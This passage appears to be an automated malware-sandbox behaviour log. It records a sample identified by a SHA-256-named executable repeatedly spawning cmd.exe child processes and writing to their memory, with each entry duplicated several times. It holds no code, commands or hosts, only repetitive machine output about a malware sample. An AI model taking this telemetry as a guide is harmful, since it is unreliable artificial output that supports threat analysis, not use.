to memory of 1316 1692 cmd.exe 993 PID 1692 wrote to memory of 1316 1692 cmd.exe 993 PID 1692 wrote to memory of 1028 1692 cmd.exe 994 PID 1692 wrote to memory of 1028 1692 cmd.exe 994 PID 1692 wrote to memory of 1028 1692 cmd.exe 994 PID 1692 wrote to memory of 1028 1692 cmd.exe 994 PID 1028 wrote to memory of 1796 1028 cmd.exe 995 PID 1028 wrote to memory of 1796 1028 cmd.exe 995 PID 1028 wrote to memory of 1796 1028 cmd.exe 995 PID 1028 wrote to memory of 1796 1028 cmd.exe 995 PID 1692 wrote to memory of 972 1692 cmd.exe 996 PID 1692 wrote to memory of 972 1692 cmd.exe 996 PID 1692 wrote to memory of 972 1692 cmd.exe 996 PID 1692 wrote to memory of 972 1692 cmd.exe 996 PID 1460 wrote to memory of 320 1460 7b5e536827c3bb9f8077aed78726585739bcde796904edd6c4faadc9a8d22eaf.exe 997 PID 1460 wrote to memory of 320 1460 7b5e536827c3bb9f8077aed78726585739bcde796904edd6c4faadc9a8d22eaf.exe 997 PID 1460 wrote to memory of 320 1460 7b5e536827c3bb9f8077aed78726585739bcde796904edd6c4faadc9a8d22eaf.exe 997 PID 1460 wrote to memory of 320 1460 7b5e536827c3bb9f8077aed78726585739bcde796904edd6c4faadc9a8d22eaf.exe 997 PID 320 wrote to memory of 1000 320 cmd.exe 999 PID 320 wrote to memory of 1000 320 cmd.exe 999 PID 320 wrote to memory of 1000 320 cmd.exe 999 PID 320 wrote to memory of 1000 320 cmd.exe 999 PID 320 wrote to memory of 952 320 cmd.exe 1000 PID 320 wrote to memory of 952 320 cmd.exe 1000 PID 320 wrote to memory of 952 320 cmd.exe 1000 PID 320 wrote to memory of 952 320 cmd.exe 1000 PID 320 wrote to memory of 396 320 cmd.exe 1001 PID 320 wrote to memory of 396 320 cmd.exe 1001 PID 320 wrote to memory of 396 320 cmd.exe 1001 PID 320 wrote to memory of 396 320 cmd.exe 1001 PID 396 wrote to memory of 1696 396 cmd.exe 1002 PID 396 wrote to memory of 1696 396 cmd.exe 1002 PID 396 wrote to memory of 1696 396 cmd.exe 1002 PID 396 wrote to memory of 1696 396 cmd.exe 1002 PID 320 wrote to memory of 824 320 cmd.exe 1003 PID 320 wrote to memory of 824 320 cmd.exe 1003 PID 320 wrote to memory of 824 320 cmd.exe 1003 PID 320 wrote to memory of 824 320 cmd.exe 1003 PID 1460 wrote to memory of 1572 1460 7b5e536827c3bb9f8077aed78726585739bcde796904edd6c4faadc9a8d22eaf.exe 1004 PID 1460 wrote to memory of 1572 1460 7b5e536827c3bb9f8077aed78726585739bcde796904edd6c4faadc9a8d22eaf.exe 1004 PID 1460 wrote to memory of 1572 1460 7b5e536827c3bb9f8077aed78726585739bcde796904edd6c4faadc9a8d22eaf.exe 1004 PID 1460 wrote to memory of 1572 1460 7b5e536827c3bb9f8077aed78726585739bcde796904edd6c4faadc9a8d22eaf.exe 1004 PID 1572 wrote to memory of 940 1572 cmd.exe 1006 PID 1572 wrote to memory of 940 1572 cmd.exe 1006 PID 1572 wrote to memory of 940 1572 cmd.exe 1006 PID 1572 wrote to memory of 940 1572 cmd.exe 1006 PID 1572 wrote to memory of 1624 1572 cmd.exe 1007 PID 1572 wrote to memory of 1624 1572 cmd.exe 1007 PID 1572 wrote to memory of 1624 1572 cmd.exe 1007 PID 1572 wrote to memory of 1624 1572 cmd.exe 1007 PID 1572 wrote to memory of 1228 1572 cmd.exe 1008 PID 1572 wrote to memory of 1228 1572 cmd.exe 1008 PID 1572 wrote to memory of 1228 1572 cmd.exe 1008 PID 1572 wrote to memory of 1228 1572 cmd.exe 1008 PID 1228 wrote to memory of 1256 1228 cmd.exe 1009 PID 1228 wrote to memory of 1256 1228 cmd.exe 1009 PID 1228 wrote to memory of 1256 1228 cmd.exe 1009 PID 1228 wrote to memory of 1256 1228 cmd.exe 1009 PID 1572 wrote to memory of 204 1572 cmd.exe 1010 PID 1572 wrote to memory of 204 1572 cmd.exe 1010 PID 1572 wrote to memory of 204 1572 cmd.exe 1010 PID 1572 wrote to memory of 204 1572 cmd.exe 1010 PID 1460 wrote to memory of 1424 1460 7b5e536827c3bb9f8077aed78726585739bcde796904edd6c4faadc9a8d22eaf.exe 1011 PID 1460 wrote to memory of 1424 1460 7b5e536827c3bb9f8077aed78726585739bcde796904edd6c4faadc9a8d22eaf.exe 1011 PID 1460 wrote to memory of 1424 1460 7b5e536827c3bb9f8077aed78726585739bcde796904edd6c4faadc9a8d22eaf.exe 1011 PID 1460 wrote to memory of 1424 1460 7b5e536827c3bb9f8077aed78726585739bcde796904edd6c4faadc9a8d22eaf.exe 1011 PID 1424 wrote to memory of 1796 1424 cmd.exe 1013 PID 1424 wrote to memory of 1796 1424 cmd.exe 1013 PID 1424 wrote to memory of 1796 1424 cmd.exe 1013 PID 1424 wrote to memory of 1796 1424 cmd.exe 1013 PID 1424 wrote to memory of 1988 1424 cmd.exe 1014 PID 1424 wrote to memory of 1988 1424 cmd.exe 1014 PID 1424 wrote to memory of 1988 1424 cmd.exe 1014 PID 1424 wrote to memory of 1988 1424 cmd.exe 1014 PID 1424 wrote to memory of 972 1424 cmd.exe 1015 PID 1424 wrote to memory of 972 1424 cmd.exe 1015 PID 1424 wrote to memory of 972 1424 cmd.exe 1015 PID 1424 wrote to memory of 972 1424 cmd.exe 1015 PID 972 wrote to memory of 1692 972 cmd.exe 1016 PID 972 wrote to memory of 1692 972 cmd.exe 1016 PID 972 wrote to memory of 1692 972 cmd.exe 1016 PID 972 wrote to memory of 1692 972 cmd.exe 1016 PID 1424 wrote to memory of 1284 1424 cmd.exe 1017 PID 1424 wrote to memory of 1284 1424 cmd.exe 1017 PID 1424 wrote to memory of 1284 1424 cmd.exe 1017 PID 1424 wrote to memory of 1284 1424 cmd.exe 1017 PID 1460 wrote to memory of 1756 1460 7b5e536827c3bb9f8077aed78726585739bcde796904edd6c4faadc9a8d22eaf.exe 1018 PID 1460 wrote to memory of 1756 1460 7b5e536827c3bb9f8077aed78726585739bcde796904edd6c4faadc9a8d22eaf.exe 1018 PID 1460 wrote to memory of 1756 1460 7b5e536827c3bb9f8077aed78726585739bcde796904edd6c4faadc9a8d22eaf.exe 1018 PID 1460 wrote to memory of 1756 1460 7b5e536827c3bb9f8077aed78726585739bcde796904edd6c4faadc9a8d22eaf.exe 1018 PID 1756 wrote to memory of 1696 1756 cmd.exe 1020 PID 1756 wrote to memory of 1696 1756 cmd.exe 1020 PID 1756 wrote to memory of 1696 1756 cmd.exe 1020 PID 1756 wrote to memory of 1696 1756 cmd.exe 1020 PID 1756 wrote to memory of 956 1756 cmd.exe 1021 PID 1756 wrote to memory of 956 1756 cmd.exe 1021 PID 1756 wrote to memory of 956 1756 cmd.exe 1021 PID 1756 wrote to memory of 956 1756 cmd.exe 1021 PID 1756 wrote to memory of 1916 1756 cmd.exe 1022 PID 1756 wrote to memory of 1916 1756 cmd.exe 1022 PID 1756 wrote to memory of 1916 1756 cmd.exe 1022 PID 1756 wrote to memory of 1916 1756 cmd.exe 1022 PID 1916 wrote to memory of 896 1916 cmd.exe 1023 PID 1916 wrote to memory of 896 1916 cmd.exe 1023 PID 1916 wrote to memory of 896 1916 cmd.exe 1023 PID 1916 wrote to memory of 896 1916 cmd.exe 1023 PID 1756 wrote to memory of 1224 1756 cmd.exe 1024 PID 1756 wrote to memory of 1224 1756 cmd.exe 1024 PID 1756 wrote to memory of 1224 1756 cmd.exe 1024 PID 1756 wrote to memory of 1224 1756 cmd.exe 1024 PID 1460 wrote to memory of 960 1460 7b5e536827c3bb9f8077aed78726585739bcde796904edd6c4faadc9a8d22eaf.exe 1025 PID 1460 wrote to memory of 960 1460 7b5e536827c3bb9f8077aed78726585739bcde796904edd6c4faadc9a8d22eaf.exe 1025 PID 1460 wrote to memory of 960 1460 7b5e536827c3bb9f8077aed78726585739bcde796904edd6c4faadc9a8d22eaf.exe 1025 PID 1460 wrote to memory of 960 1460 7b5e536827c3bb9f8077aed78726585739bcde796904edd6c4faadc9a8d22eaf.exe 1025 PID 960 wrote to memory of 1256 960 cmd.exe 1027 PID 960 wrote to memory of 1256 960 cmd.exe 1027 PID 960 wrote to memory of 1256 960 cmd.exe 1027 PID 960 wrote to memory of 1256 960 cmd.exe 1027 PID 960 wrote to memory of 968 960 cmd.exe 1028 PID 960 wrote to memory of 968 960 cmd.exe 1028 PID 960 wrote to memory of 968 960 cmd.exe 1028 PID 960 wrote to memory of 968 960 cmd.exe 1028 PID 960 wrote to memory of 204 960 cmd.exe 1029 PID 960 wrote to memory of 204 960 cmd.exe 1029 PID 960 wrote to memory of 204 960 cmd.exe 1029 PID 960 wrote to memory of 204 960 cmd.exe 1029 PID 204 wrote to memory of 1572 204 cmd.exe 1030 PID 204 wrote to memory of 1572 204 cmd.exe 1030 PID 204 wrote to memory of 1572 204 cmd.exe 1030 PID 204 wrote to memory of 1572 204 cmd.exe 1030 PID 960 wrote to memory of 1028 960 cmd.exe 1031 PID 960 wrote to memory of 1028 960 cmd.exe 1031 PID 960 wrote to memory of 1028 960 cmd.exe 1031 PID 960 wrote to memory of 1028 960 cmd.exe 1031 PID 1460 wrote to memory of 216 1460 7b5e536827c3bb9f8077aed78726585739bcde796904edd6c4faadc9a8d22eaf.exe 1032 PID 1460 wrote to memory of 216 1460 7b5e536827c3bb9f8077aed78726585739bcde796904edd6c4faadc9a8d22eaf.exe 1032 PID 1460 wrote to memory of 216 1460 7b5e536827c3bb9f8077aed78726585739bcde796904edd6c4faadc9a8d22eaf.exe 1032 PID 1460 wrote to memory of 216 1460 7b5e536827c3bb9f8077aed78726585739bcde796904edd6c4faadc9a8d22eaf.exe 1032 PID 216 wrote to memory of 1692 216 cmd.exe 1034 PID 216 wrote to memory of 1692 216 cmd.exe 1034 PID 216 wrote to memory of 1692 216 cmd.exe 1034 PID 216 wrote to memory of 1692 216 cmd.exe 1034 PID 216 wrote to memory of 336 216 cmd.exe 1035 PID 216 wrote to memory of 336 216 cmd.exe 1035 PID 216 wrote to memory of 336 216 cmd.exe 1035 PID 216 wrote to memory of 336 216 cmd.exe 1035 PID 216 wrote to memory of 1284 216 cmd.exe 1036 PID 216 wrote to memory of 1284 216 cmd.exe 1036 PID 216 wrote to memory of 1284 216 cmd.exe 1036 PID 216 wrote to memory of 1284 216 cmd.exe 1036 PID 1284 wrote to memory of 780 1284 cmd.exe 1037 PID 1284 wrote to memory of 780 1284 cmd.exe 1037 PID 1284 wrote to memory of 780 1284 cmd.exe 1037 PID 1284 wrote to memory of 780 1284 cmd.exe 1037 PID 216 wrote to memory of 396 216 cmd.exe 1038 PID 216 wrote to memory of 396 216 cmd.exe 1038 PID 216 wrote to memory of 396 216 cmd.exe 1038 PID 216 wrote to memory of 396 216 cmd.exe 1038 PID 1460 wrote to memory of 1380 1460 7b5e536827c3bb9f8077aed78726585739bcde796904edd6c4faadc9a8d22eaf.exe 1039 PID 1460 wrote to memory of 1380 1460 7b5e536827c3bb9f8077aed78726585739bcde796904edd6c4faadc9a8d22eaf.exe 1039 PID 1460 wrote to memory of 1380 1460 7b5e536827c3bb9f8077aed78726585739bcde796904edd6c4faadc9a8d22eaf.exe 1039 PID 1460 wrote to memory of 1380 1460 7b5e536827c3bb9f8077aed78726585739bcde796904edd6c4faadc9a8d22eaf.exe 1039 PID 1380 wrote to memory of 896 1380 cmd.exe 1041 PID 1380 wrote to memory of 896 1380 cmd.exe 1041 PID 1380 wrote to memory of 896 1380 cmd.exe 1041 PID 1380 wrote to memory of 896 1380 cmd.exe 1041 PID 1380 wrote to memory of 940 1380 cmd.exe 1042 PID 1380 wrote to memory of 940 1380 cmd.exe 1042 PID 1380 wrote to memory of 940 1380 cmd.exe 1042 PID 1380 wrote to memory of 940 1380 cmd.exe 1042 PID 1380 wrote to memory of 1224 1380 cmd.exe 1043 PID 1380 wrote to memory of 1224 1380 cmd.exe 1043 PID 1380 wrote to memory of 1224 1380 cmd.exe 1043 PID 1380 wrote to memory of 1224 1380 cmd.exe 1043 PID 1224 wrote to memory of 1756 1224 cmd.exe 1044 PID 1224 wrote to memory of 1756 1224 cmd.exe 1044 PID 1224 wrote to memory of 1756 1224 cmd.exe 1044 PID 1224 wrote to memory of 1756 1224 cmd.exe 1044 PID 1380 wrote to memory of 1228 1380 cmd.exe 1045 PID 1380 wrote to memory of 1228 1380 cmd.exe 1045 PID 1380 wrote to memory of 1228 1380 cmd.exe 1045 PID 1380 wrote to memory of 1228 1380 cmd.exe 1045 PID 1460 wrote to memory of 1836 1460 7b5e536827c3bb9f8077aed78726585739bcde796904edd6c4faadc9a8d22eaf.exe 1046 PID 1460 wrote to memory of 1836 1460 7b5e536827c3bb9f8077aed78726585739bcde796904edd6c4faadc9a8d22eaf.exe 1046 PID 1460 wrote to memory of 1836 1460 7b5e536827c3bb9f8077aed78726585739bcde796904edd6c4faadc9a8d22eaf.exe 1046 PID 1460 wrote to memory of 1836 1460 7b5e536827c3bb9f8077aed78726585739bcde796904edd6c4faadc9a8d22eaf.exe 1046 PID 1836 wrote to memory of 1572 1836 cmd.exe 1048 PID 1836 wrote to memory of 1572 1836 cmd.exe 1048 PID 1836 wrote to memory of 1572 1836 cmd.exe 1048 PID 1836 wrote to memory of 1572 1836 cmd.exe 1048 PID 1836 wrote to memory of 1796 1836 cmd.exe 1049 PID 1836 wrote to memory of 1796 1836 cmd.exe 1049 PID 1836 wrote to memory of 1796 1836 cmd.exe 1049 PID 1836 wrote to memory of 1796 1836 cmd.exe 1049 PID 1836 wrote to memory of 1028 1836 cmd.exe 1050 PID 1836 wrote to memory of 1028 1836 cmd.exe 1050 PID 1836 wrote to memory of 1028 1836 cmd.exe 1050 PID 1836 wrote to memory of 1028 1836 cmd.exe 1050 PID 1028 wrote to memory of 960 1028 cmd.exe 1051 PID 1028 wrote to memory of 960 1028 cmd.exe 1051 PID 1028 wrote to memory of 960 1028 cmd.exe 1051 PID 1028 wrote to memory of 960 1028 cmd.exe 1051 PID 1836 wrote to memory of 972 1836 cmd.exe 1052 PID 1836 wrote to memory of 972 1836 cmd.exe 1052 PID 1836 wrote to memory of 972 1836 cmd.exe 1052 PID 1836 wrote to memory of 972 1836 cmd.exe 1052 PID 1460 wrote to memory of 1536 1460 7b5e536827c3bb9f8077aed78726585739bcde796904edd6c4faadc9a8d22eaf.exe 1053 PID 1460 wrote to memory of 1536 1460 7b5e536827c3bb9f8077aed78726585739bcde796904edd6c4faadc9a8d22eaf.exe 1053 PID 1460 wrote to memory of 1536 1460 7b5e536827c3bb9f8077aed78726585739bcde796904edd6c4faadc9a8d22eaf.exe 1053 PID 1460 wrote to memory of 1536 1460 7b5e536827c3bb9f8077aed78726585739bcde796904edd6c4faadc9a8d22eaf.exe 1053 PID 1536 wrote to memory of 780 1536 cmd.exe 1055 PID 1536 wrote to memory of 780 1536 cmd.exe 1055 PID 1536 wrote to memory of 780 1536 cmd.exe 1055 PID 1536 wrote to memory of 780 1536 cmd.exe 1055 PID 1536 wrote to memory of 1824 1536 cmd.exe 1056 PID 1536 wrote to memory of 1824 1536 cmd.exe 1056 PID 1536 wrote to memory of 1824 1536 cmd.exe 1056 PID 1536 wrote to memory of 1824 1536 cmd.exe 1056 PID 1536 wrote to memory of 1988 1536 cmd.exe 1057 PID 1536 wrote to memory of 1988 1536 cmd.exe 1057 PID 1536 wrote to memory of 1988 1536 cmd.exe 1057 PID 1536 wrote to memory of 1988 1536 cmd.exe 1057 PID 1988 wrote to memory of 1992 1988 cmd.exe 1058 PID 1988 wrote to memory of 1992 1988 cmd.exe 1058 PID 1988 wrote to memory of 1992 1988 cmd.exe 1058 PID 1988 wrote to memory of 1992 1988 cmd.exe 1058 PID 1536 wrote to memory of 1916 1536 cmd.exe 1059 PID 1536 wrote to memory of 1916 1536 cmd.exe 1059 PID 1536 wrote to memory of 1916 1536 cmd.exe 1059 PID 1536 wrote to memory of 1916 1536 cmd.exe 1059 PID 1460 wrote to memory of 1912 1460 7b5e536827c3bb9f8077aed78726585739bcde796904edd6c4faadc9a8d22eaf.exe 1060 PID 1460 wrote to memory of 1912 1460 7b5e536827c3bb9f8077aed78726585739bcde796904edd6c4faadc9a8d22eaf.exe 1060 PID 1460 wrote to memory of 1912 1460 7b5e536827c3bb9f8077aed78726585739bcde796904edd6c4faadc9a8d22eaf.exe 1060 PID 1460 wrote to memory of 1912 1460 7b5e536827c3bb9f8077aed78726585739bcde796904edd6c4faadc9a8d22eaf.exe 1060 PID 1912 wrote to memory of 1756 1912 cmd.exe 1062 PID 1912 wrote to memory of 1756 1912 cmd.exe 1062 PID 1912 wrote to memory of 1756 1912 cmd.exe 1062 PID 1912 wrote to memory of 1756 1912 cmd.exe 1062 PID 1912 wrote to memory of 1256 1912 cmd.exe 1063 PID 1912 wrote to memory of 1256 1912 cmd.exe 1063 PID 1912 wrote to memory of 1256 1912 cmd.exe 1063 PID 1912 wrote to memory of 1256 1912 cmd.exe 1063 PID 1912 wrote to memory of 1820 1912 cmd.exe 1064 PID 1912 wrote to memory of 1820 1912 cmd.exe 1064 PID 1912 wrote to memory of 1820 1912 cmd.exe 1064 PID 1912 wrote to memory of 1820 1912 cmd.exe 1064 PID 1820 wrote to memory of 304 1820 cmd.exe 1065 PID 1820 wrote to memory of 304 1820 cmd.exe 1065 PID 1820 wrote to memory of 304 1820 cmd.exe 1065 PID 1820 wrote to memory of 304 1820 cmd.exe 1065 PID 1912 wrote to memory of 1876 1912 cmd.exe 1066 PID 1912 wrote to memory of 1876 1912 cmd.exe 1066 PID 1912 wrote to memory of 1876 1912 cmd.exe 1066 PID 1912 wrote to memory of 1876 1912 cmd.exe 1066 PID 1460 wrote to memory of 1796 1460 7b5e536827c3bb9f8077aed78726585739bcde796904edd6c4faadc9a8d22eaf.exe 1067 PID 1460 wrote to memory of 1796 1460 7b5e536827c3bb9f8077aed78726585739bcde796904edd6c4faadc9a8d22eaf.exe 1067 PID 1460 wrote to memory of 1796 1460 7b5e536827c3bb9f8077aed78726585739bcde796904edd6c4faadc9a8d22eaf.exe 1067 PID 1460 wrote to memory of 1796 1460 7b5e536827c3bb9f8077aed78726585739bcde796904edd6c4faadc9a8d22eaf.exe 1067 PID 1796 wrote to memory of 1260 1796 cmd.exe 1069 PID 1796 wrote to memory of 1260 1796 cmd.exe 1069 PID 1796 wrote to memory of 1260 1796 cmd.exe 1069 PID 1796 wrote to memory of 1260 1796 cmd.exe 1069 PID 1796 wrote to memory of 1852 1796 cmd.exe 1070 PID 1796 wrote to memory of 1852 1796 cmd.exe 1070 PID 1796 wrote to memory of 1852 1796 cmd.exe 1070 PID 1796 wrote to memory of 1852 1796 cmd.exe 1070 PID 1796 wrote to memory of 968 1796 cmd.exe 1071 PID 1796 wrote to memory of 968 1796 cmd.exe 1071 PID 1796 wrote to memory of 968 1796 cmd.exe 1071 PID 1796 wrote to memory of 968 1796 cmd.exe 1071 PID 968 wrote to memory of 1752 968 cmd.exe 1072 PID 968 wrote to memory of 1752 968 cmd.exe 1072 PID 968 wrote to memory of 1752 968 cmd.exe 1072 PID 968 wrote to memory of 1752 968 cmd.exe 1072 PID 1796 wrote to memory of 1144 1796 cmd.exe 1073 PID 1796 wrote to memory of 1144 1796 cmd.exe 1073 PID 1796 wrote to memory of 1144 1796 cmd.exe 1073 PID 1796 wrote to memory of 1144 1796 cmd.exe 1073 PID 1460 wrote to memory of 1824 1460 7b5e536827c3bb9f8077aed78726585739bcde796904edd6c4faadc9a8d22eaf.exe 1074 PID 1460 wrote to memory of 1824 1460 7b5e536827c3bb9f8077aed78726585739bcde796904edd6c4faadc9a8d22eaf.exe 1074 PID 1460 wrote to memory of 1824 1460 7b5e536827c3bb9f8077aed78726585739bcde796904edd6c4faadc9a8d22eaf.exe 1074 PID 1460 wrote to memory of 1824 1460 7b5e536827c3bb9f8077aed78726585739bcde796904edd6c4faadc9a8d22eaf.exe 1074 PID 1824 wrote to memory of 744 1824 cmd.exe 1076 PID 1824 wrote to memory of 744 1824 cmd.exe 1076 PID 1824 wrote to memory of 744 1824 cmd.exe 1076 PID 1824 wrote to memory of 744 1824 cmd.exe 1076 PID 1824 wrote to memory of 1928 1824 cmd.exe 1077 PID 1824 wrote to memory of 1928 1824 cmd.exe 1077 PID 1824 wrote to memory of 1928 1824 cmd.exe 1077 PID 1824 wrote to memory of 1928 1824 cmd.exe 1077 PID 1824 wrote to memory of 336 1824 cmd.exe 1078 PID 1824 wrote to memory of 336 1824 cmd.exe 1078 PID 1824 wrote to memory of 336 1824 cmd.exe 1078 PID 1824 wrote to memory of 336 1824 cmd.exe 1078 PID 336 wrote to memory of 1800 336 cmd.exe 1079 PID 336 wrote to memory of 1800 336 cmd.exe 1079 PID 336 wrote to memory of 1800 336 cmd.exe 1079 PID 336 wrote to memory of 1800 336 cmd.exe 1079 PID 1824 wrote to memory of 208 1824 cmd.exe 1080 PID 1824 wrote to memory of 208 1824 cmd.exe 1080 PID 1824 wrote to memory of 208 1824 cmd.exe 1080 PID 1824 wrote to memory of 208 1824 cmd.exe 1080 PID 1460 wrote to memory of 1256 1460 7b5e536827c3bb9f8077aed78726585739bcde796904edd6c4faadc9a8d22eaf.exe 1081 PID 1460 wrote to memory of 1256 1460 7b5e536827c3bb9f8077aed78726585739bcde796904edd6c4faadc9a8d22eaf.exe 1081 PID 1460 wrote to memory of 1256 1460 7b5e536827c3bb9f8077aed78726585739bcde796904edd6c4faadc9a8d22eaf.exe 1081 PID 1460 wrote to memory of 1256 1460 7b5e536827c3bb9f8077aed78726585739bcde796904edd6c4faadc9a8d22eaf.exe 1081 PID 1256 wrote to memory of 956 1256 cmd.exe 1083 PID 1256 wrote to memory of 956 1256 cmd.exe 1083 PID 1256 wrote to memory of 956 1256 cmd.exe 1083 PID 1256 wrote to memory of 956 1256 cmd.exe 1083 PID 1256 wrote to memory of 828 1256 cmd.exe 1084 PID 1256 wrote to memory of 828 1256 cmd.exe 1084 PID 1256 wrote to memory of 828 1256 cmd.exe 1084 PID 1256 wrote to memory of 828 1256 cmd.exe 1084 PID 1256 wrote to memory of 1780 1256 cmd.exe 1085 PID 1256 wrote to memory of 1780 1256 cmd.exe 1085 PID 1256 wrote to memory of 1780 1256 cmd.exe 1085 PID 1256 wrote to memory of 1780 1256 cmd.exe 1085 PID 1780 wrote to memory of 1912 1780 cmd.exe 1086 PID 1780 wrote to memory of 1912 1780 cmd.exe 1086 PID 1780 wrote to memory of 1912 1780 cmd.exe 1086 PID 1780 wrote to memory of 1912 1780 cmd.exe 1086 PID 1256 wrote to memory of 1028 1256 cmd.exe 1087 PID 1256 wrote to memory of 1028 1256 cmd.exe 1087 PID 1256 wrote to memory of 1028 1256 cmd.exe 1087 PID 1256 wrote to memory of 1028 1256 cmd.exe 1087 PID 1460 wrote to memory of 1852 1460 7b5e536827c3bb9f8077aed78726585739bcde796904edd6c4faadc9a8d22eaf.exe 1088 PID 1460 wrote to memory of 1852 1460 7b5e536827c3bb9f8077aed78726585739bcde796904edd6c4faadc9a8d22eaf.exe 1088 PID 1460 wrote to memory of 1852 1460 7b5e536827c3bb9f8077aed78726585739bcde796904edd6c4faadc9a8d22eaf.exe 1088 PID 1460 wrote to memory of 1852 1460 7b5e536827c3bb9f8077aed78726585739bcde796904edd6c4faadc9a8d22eaf.exe 1088 PID 1852 wrote to memory of 1836 1852 cmd.exe 1090 PID 1852 wrote to memory of 1836 1852 cmd.exe 1090 PID 1852 wrote to memory of 1836 1852 cmd.exe 1090 PID 1852 wrote to memory of 1836 1852 cmd.exe 1090 PID 1852 wrote to memory of 824 1852 cmd.exe 1091 PID 1852 wrote to memory of 824 1852 cmd.exe 1091 PID 1852 wrote to memory of 824 1852 cmd.exe 1091 PID 1852 wrote to memory of 824 1852 cmd.exe 1091 PID 1852 wrote to memory of 960 1852 cmd.exe 1092 PID 1852 wrote to memory of 960 1852 cmd.exe 1092 PID 1852 wrote to memory of 960 1852 cmd.exe 1092 PID 1852 wrote to memory of 960 1852 cmd.exe 1092 PID 960 wrote to memory of 1796 960 cmd.exe 1093 PID 960 wrote to memory of 1796 960 cmd.exe 1093 PID 960 wrote to memory of 1796 960 cmd.exe 1093 PID 960 wrote to memory of 1796 960 cmd.exe 1093 PID 1852 wrote to memory of 1988 1852 cmd.exe 1094 PID 1852 wrote to memory of 1988 1852 cmd.exe 1094 PID 1852 wrote to memory of 1988 1852 cmd.exe 1094 PID 1852 wrote to memory of 1988 1852 cmd.exe 1094 PID 1460 wrote to memory of 1928 1460 7b5e536827c3bb9f8077aed78726585739bcde796904edd6c4faadc9a8d22eaf.exe 1095 PID 1460 wrote to memory of 1928 1460 7b5e536827c3bb9f8077aed78726585739bcde796904edd6c4faadc9a8d22eaf.exe 1095 PID 1460 wrote to memory of 1928 1460 7b5e536827c3bb9f8077aed78726585739bcde796904edd6c4faadc9a8d22eaf.exe 1095 PID 1460 wrote to memory of 1928 1460 7b5e536827c3bb9f8077aed78726585739bcde796904edd6c4faadc9a8d22eaf.exe 1095 PID 1928 wrote to memory of 1536 1928 cmd.exe 1097 PID 1928 wrote to memory of 1536 1928 cmd.exe 1097 PID 1928 wrote to memory of 1536 1928 cmd.exe 1097 PID 1928 wrote to memory of 1536 1928 cmd.exe 1097 PID 1928 wrote to memory of 880 1928 cmd.exe 1098 PID 1928 wrote to memory of 880 1928 cmd.exe 1098 PID 1928 wrote to memory of 880 1928 cmd.exe 1098 PID 1928 wrote to memory of 880 1928 cmd.exe 1098 PID 1928 wrote to memory of 1992 1928 cmd.exe 1099 PID 1928 wrote to memory of 1992 1928 cmd.exe 1099 PID 1928 wrote to memory of 1992 1928 cmd.exe 1099 PID 1928 wrote to memory of 1992 1928 cmd.exe 1099 PID 1992 wrote to memory of 216 1992 cmd.exe 1100 PID 1992 wrote to memory of 216 1992 cmd.exe 1100 PID 1992 wrote to memory of 216 1992 cmd.exe 1100 PID 1992 wrote to memory of 216 1992 cmd.exe 1100 PID 1928 wrote to memory of 1820 1928 cmd.exe 1101 PID 1928 wrote to memory of 1820 1928 cmd.exe 1101 PID 1928 wrote to memory of 1820 1928 cmd.exe 1101 PID 1928 wrote to memory of 1820 1928 cmd.exe 1101 PID 1460 wrote to memory of 1152 1460 7b5e536827c3bb9f8077aed78726585739bcde796904edd6c4faadc9a8d22eaf.exe 1102 PID 1460 wrote to memory of 1152 1460 7b5e536827c3bb9f8077aed78726585739bcde796904edd6c4faadc9a8d22eaf.exe 1102 PID 1460 wrote to memory of 1152 1460 7b5e536827c3bb9f8077aed78726585739bcde796904edd6c4faadc9a8d22eaf.exe 1102 PID 1460 wrote to memory of 1152 1460 7b5e536827c3bb9f8077aed78726585739bcde796904edd6c4faadc9a8d22eaf.exe 1102 PID 1152 wrote to memory of 1912 1152 cmd.exe 1104 PID 1152 wrote to memory of 1912 1152 cmd.exe 1104 PID 1152 wrote to memory of 1912 1152 cmd.exe 1104 PID 1152 wrote to memory of 1912 1152 cmd.exe 1104 PID 1152 wrote to memory of 1476 1152 cmd.exe 1105 PID 1152 wrote to memory of 1476 1152 cmd.exe 1105 PID 1152 wrote to memory of 1476 1152 cmd.exe 1105 PID 1152 wrote to memory of 1476 1152 cmd.exe 1105 PID 1152 wrote to memory of 304 1152 cmd.exe 1106 PID 1152 wrote to memory of 304 1152 cmd.exe 1106 PID 1152 wrote to memory of 304 1152 cmd.exe 1106 PID 1152 wrote to memory of 304 1152 cmd.exe 1106 PID 304 wrote to memory of 1000 304 cmd.exe 1107 PID 304 wrote to memory of 1000 304 cmd.exe 1107 PID 304 wrote to memory of 1000 304 cmd.exe 1107 PID 304 wrote to memory of 1000 304 cmd.exe 1107 PID 1152 wrote to memory of 396 1152 cmd.exe 1108 PID 1152 wrote to memory of 396 1152 cmd.exe 1108 PID 1152 wrote to memory of 396 1152 cmd.exe 1108 PID 1152 wrote to memory of 396 1152 cmd.exe 1108 PID 1460 wrote to memory of 572 1460 7b5e536827c3bb9f8077aed78726585739bcde796904edd6c4faadc9a8d22eaf.exe 1109 PID 1460 wrote to memory of 572 1460 7b5e536827c3bb9f8077aed78726585739bcde796904edd6c4faadc9a8d22eaf.exe 1109 PID 1460 wrote to memory of 572 1460 7b5e536827c3bb9f8077aed78726585739bcde796904edd6c4faadc9a8d22eaf.exe 1109 PID 1460 wrote to memory of 572 1460 7b5e536827c3bb9f8077aed78726585739bcde796904edd6c4faadc9a8d22eaf.exe 1109 PID 572 wrote to memory of 1796 572 cmd.exe 1111 PID 572 wrote to memory of 1796 572 cmd.exe 1111 PID 572 wrote to memory of 1796 572 cmd.exe 1111 PID 572 wrote to memory of 1796 572 cmd.exe 1111 PID 572 wrote to memory of 1444 572 cmd.exe 1112 PID 572 wrote to memory of 1444 572 cmd.exe 1112 PID 572 wrote to memory of 1444 572 cmd.exe 1112 PID 572 wrote to memory of 1444 572 cmd.exe 1112 PID 572 wrote to memory of 1988 572 cmd.exe 1113 PID 572 wrote to memory of 1988 572 cmd.exe 1113 PID 572 wrote to memory of 1988 572 cmd.exe 1113 PID 572 wrote to memory of 1988 572 cmd.exe 1113 PID 1988 wrote to memory of 1424 1988 cmd.exe 1114 PID 1988 wrote to memory of 1424 1988 cmd.exe 1114 PID 1988 wrote to memory of 1424 1988 cmd.exe 1114 PID 1988 wrote to memory of 1424 1988 cmd.exe 1114 PID 572 wrote to memory of 1228 572 cmd.exe 1115 PID 572 wrote to memory of 1228 572 cmd.exe 1115 PID 572 wrote to memory of 1228 572 cmd.exe 1115 PID 572 wrote to memory of 1228 572 cmd.exe 1115 PID 1460 wrote to memory of 1756 1460 7b5e536827c3bb9f8077aed78726585739bcde796904edd6c4faadc9a8d22eaf.exe 1116 PID 1460 wrote to memory of 1756 1460 